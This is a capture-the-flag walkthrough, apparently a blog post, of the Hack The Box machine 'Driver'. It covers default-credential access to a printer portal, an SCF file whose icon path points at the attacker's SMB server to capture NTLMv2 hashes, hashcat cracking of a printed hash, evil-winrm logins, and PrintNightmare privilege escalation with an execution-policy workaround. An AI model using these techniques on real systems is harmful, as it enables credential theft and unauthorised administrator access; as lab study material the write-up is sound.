BlueDolphin

Hack the Box - Driver

Updated: Apr 20, 2022

Engagement flow

Summary

This was an easy-rated machine. Default credentials gave us our initial foothold into the MFP Firmware Update Center. From there we identified a possible SCF file upload vector, tested it, and confirmed it: uploading an .scf file whose IconFile entry points at our host made the server open an SMB connection to our rogue Responder server and attempt NTLMv2 authentication. We cracked the captured hash with hashcat and used Evil-WinRM to log in to the target as the user tony. Internal enumeration revealed a RICOH PCL6 printer driver, which told us the Print Spooler service was in use and therefore a candidate for the PrintNightmare vulnerability. The PowerShell execution policy blocked running the PrintNightmare script directly; we bypassed that by loading the script through Evil-WinRM's scripts directory and invoking its functions from inside the session, which gave us a local administrator account and full control of the box.

Tools used
  • Responder (SMB server)

  • Hashcat

  • Evil-WinRM

  • winPEAS

Processes/Techniques
  • SCF injection

  • Hash capturing NTLMv2

  • Rogue SMB server (Responder) for credential capture

  • Internal enumeration

  • PrintNightmare vulnerability

Enumeration

A basic nmap scan reveals three open ports. The usual suspect, port 22 for SSH, is missing. We do have the regular port 80 (HTTP) plus 135 (MSRPC) and 445 (SMB), which points at a Windows host with SMB in use.


We perform a more in-depth scan with the -sC and -sV flags. This tells us the target is running Microsoft IIS httpd 10.0. The SMB scripts also show that the server requires authentication and does not allow guest access, which closes the door on unauthenticated SMB attacks at this stage.


Web enumeration

Browsing to the web page produces an HTTP authentication prompt. The text in the prompt reveals that our target is some kind of printer portal. Entering the default credentials admin:admin grants access. (That does not happen often; usually you have to dig the default credentials out of the device manual's setup instructions.)



MFP Firmware Update Center

Our landing page is basic and straightforward. The only link in the ribbon that actually works is the Firmware Updates center.

Initial foothold

At this stage we did a fair amount of research and testing, and posted a number of questions on the Hack The Box forum. This led us to a type of attack that was new to us: SCF file injection. SCF stands for Shell Command File, a small INI-style file understood by Windows Explorer. An .scf file does not execute commands on the target. Its IconFile entry can point to a UNC path, and when Explorer renders a folder containing the file it fetches that icon over SMB and authenticates to the remote host with the current user's credentials. Drop one where someone on the target will browse it and you receive their NTLMv2 response. The two links below offer a very good explanation.


Configure an .scf file

[Shell]
Command=2
IconFile=\\10.10.14.24\share\test.scf
[Taskbar]
Command=ToggleDesktop

Fire up Responder and confirm that its SMB server is running.


We then upload our .scf file through the MFP Firmware Update Center and click Submit. Shortly afterwards we should see activity on our Responder server.



We can see that the attack worked. Something on the target opened the folder containing our .scf file, Explorer tried to fetch the icon from \\10.10.14.24\share, and Responder's SMB server accepted the connection and recorded the NTLMv2 authentication attempt. No spoofing or man-in-the-middle position was needed: the victim connected to us directly because the IconFile path pointed at our IP.


Crack the hash

We take this hash and run it through hashcat. The capture is a NetNTLMv2 response, which is hashcat mode 5600, and we pair it with the common rockyou.txt wordlist. We arrive at the password liltony.

hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt 

tony::DRIVER:318176a96a4b3650:695C6727BCA1FCED2457FAB5A990D343:0101000000000000001475FB8430D8018B78B6606899D06E0000000002000800340035003200430001001E00570049004E002D00390042003800550051004800300033005A004900390004003400570049004E002D00390042003800550051004800300033005A00490039002E0034003500320043002E004C004F00430041004C000300140034003500320043002E004C004F00430041004C000500140034003500320043002E004C004F00430041004C0007000800001475FB8430D80106000400020000000800300030000000000000000000000000200000A88F15A0CDD2E31A163DF538EFC1B299CE43C13228698CE67780D4B48BFEA9820A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E0032003400000000000000000000000000



Initial connection

With a valid set of credentials we proceed to connect to the target. There is no SSH on port 22, but Evil-WinRM gives us a PowerShell session over WinRM (TCP 5985), a port the firewall rules we review later show to be open.


We upload and run winPEAS to help with initial enumeration.

Evidence 1

The Powershell history of user tony may reveal valuable information.

 Directory of C:\Users\tony\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine

09/28/2021  11:06 AM               134 ConsoleHost_history.txt

It shows only that a Ricoh printer was added using the RICOH PCL6 UniversalDriver. That is a small but useful hint: a printer driver means the Print Spooler service is installed and in use.


Evidence 2

The Windows Firewall is enabled on the Standard profile.

Firewall status:
-------------------------------------------------------------------
Profile                           = Standard
Operational mode                  = Enable
Exception mode                    = Enable
Multicast/broadcast response mode = Enable
Notification mode                 = Enable
Group policy version              = Windows Firewall
Remote admin mode                 = Disable



Evidence 3

Reviewing the port rules we notice an inbound allow rule for TCP 5985, the WinRM port. This rule is what makes our Evil-WinRM connection possible; it was already in place rather than created by our tool.

Port configuration for Domain profile:
Port   Protocol  Mode    Traffic direction     Name
-------------------------------------------------------------------
5985   TCP       Enable  Inbound               winrm

ICMP configuration for Domain profile:
Mode     Type  Description



Evidence 4

We review the hidden folders winPEAS identified for us and again notice RICOH_DRV, the folder for the Ricoh printer driver. Research into this driver turns up vulnerabilities in various versions, but what matters more here is what the folder confirms: a printer driver is installed, so the Print Spooler service is running, and that is the precondition for the PrintNightmare vulnerability we exploit below.

Searching hidden files or folders in C:\Users home (can be slow)

     C:\Users\All Users\ntuser.pol
     C:\Users\All Users\RICOH_DRV
     C:\Users\Default User
     C:\Users\Default
     C:\Users\All Users
     C:\Users\tony\AppData\Local\Packages\Windows.PurchaseDialog_cw5n1h2txyewy\Windows.PurchaseDialog_6.2.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore\ActivationStore.dat.LOG2
     C:\Users\tony\AppData\Local\Packages\Windows.PurchaseDialog_cw5n1h2txyewy\Windows.PurchaseDialog_6.2.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore\ActivationStore.dat.LOG1
     C:\Users\tony\AppData\Local\Packages\Windows.ContactSupport_cw5n1h2txyewy\Windows.ContactSupport_10.0.10240.16384_neutral_neutral_cw5n1h2txyewy\ActivationStore\ActivationStore.dat.LOG2
     C:\Users\tony\AppData\Local\Packages\Windows.ContactSupport_cw5n1h2txyewy\Windows.ContactSupport_10.0.10240.16384_neutral_neutral_cw5n1h2txyewy\ActivationStore\ActivationStore.dat.LOG1
     C:\Users\tony\ntuser.pol
     C:\Users\All Users\RICOH_DRV\RICOH PCL6 UniversalDriver V4.23\do_not_delete_folders

Ricoh PCL6 Vulnerability

Reading the article below provides some insight into the Ricoh printer driver attack that allows for privilege escalation.





I had some trouble getting the exploit to work and learned how to use Evil-WinRM to import modules. The execution policy was Restricted, so I could not import the PrintNightmare functions directly from PowerShell by running the .ps1 file.


To get the script into the session without tripping the execution policy, Evil-WinRM can be pointed at a local directory of PowerShell scripts with the -s flag when the connection is established. Any script in that directory can then be loaded by typing its name at the prompt; Evil-WinRM sends the script's contents through the existing WinRM session instead of executing a .ps1 file from the target's disk, so the execution policy does not apply.


└─$ evil-winrm -i 10.129.95.238 -u tony -p liltony -s /home/kali/HTB/driver/                                                           

Root

Looking at the Evil-WinRM menu there are also Dll-Loader and Invoke-Binary options that may work as well, but I have not tested them.


I simply called our script by typing exploit.ps1 at the Evil-WinRM prompt. Listing the menu again shows the PrintNightmare functions have been added; the script's helper appears as get_nightmare_dll.


From here we call the Invoke-Nightmare function. It executes successfully and creates a local administrator account with the script's default credentials, adm1n:P@ssw0rd.


Finally we use Evil-WinRM again to connect with the new credentials created by the PrintNightmare exploit.
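The checks below are an added example, not commands from the original write-up or from the PrintNightmare script: they are what I would run in the Evil-WinRM session before calling Invoke-Nightmare and again afterwards, so that a failed run can be explained rather than guessed at. The Spooler service and Ricoh driver are the ones found during enumeration, the account name and password are the script defaults mentioned above, and the Point and Print registry values are the hardening settings Microsoft documented after PrintNightmare; they are assumed to be absent on an unpatched host.

```powershell
# Added example for this write-up (not the author's commands).
# Run inside the Evil-WinRM session as tony.

# 1. Precondition: PrintNightmare needs a running Print Spooler.
Get-Service -Name Spooler | Select-Object Name, Status, StartType

# 2. Evidence the spooler is really in use: the Ricoh driver and any printer bound to it.
Get-PrinterDriver | Select-Object Name, Manufacturer, MajorVersion
Get-Printer | Select-Object Name, DriverName, PortName

# 3. Why .\exploit.ps1 would not run directly: the effective execution policy per scope.
Get-ExecutionPolicy -List

# 4. Post-PrintNightmare Point and Print hardening (assumption: the values Microsoft
#    documented). No key, or RestrictDriverInstallationToAdministrators = 0, means
#    non-administrators may still install printer drivers.
$pp = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint'
Get-ItemProperty -Path $pp -ErrorAction SilentlyContinue |
    Select-Object RestrictDriverInstallationToAdministrators, NoWarningNoElevationOnInstall, UpdatePromptSettings

# 5. After Invoke-Nightmare: confirm the account exists and is a local administrator
#    before spending time on a second Evil-WinRM connection.
Get-LocalUser -Name adm1n | Select-Object Name, Enabled, LastLogon
Get-LocalGroupMember -Group Administrators | Where-Object Name -like '*\adm1n'
```

If step 1 shows the Spooler stopped or step 4 shows RestrictDriverInstallationToAdministrators set to 1, the exploit will fail regardless of how the script is loaded, and the execution policy workaround in the previous section is not the problem.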

